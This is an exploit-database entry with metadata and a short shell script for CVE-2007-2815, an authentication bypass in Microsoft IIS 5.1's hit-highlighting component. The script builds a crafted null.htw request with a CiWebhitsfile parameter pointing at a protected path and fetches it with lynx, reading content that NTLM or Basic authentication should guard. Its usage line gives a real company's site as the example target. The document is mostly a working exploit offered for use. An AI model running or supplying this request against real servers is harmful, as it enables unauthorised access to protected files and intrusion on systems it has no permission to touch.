Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass

Author: Sha0
type: remote
platform: windows
port: 
date_added: 2007-05-30  
date_updated:   
verified: 1  
codes: OSVDB-41091;CVE-2007-2815  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4016.sh  

#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: https://www.securityfocus.com/bid/24105/info   (CVE-2007-2815)

if [ $# != 2 ]
then
        printf "USAGE:\t\t$0 <Site> <Protected Object>\nExample:\t$0 http://www.microsoft.com  /en/us/default.aspx\n\n";
        exit 0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
lynx -dump $evil

# milw0rm.com [2007-05-31]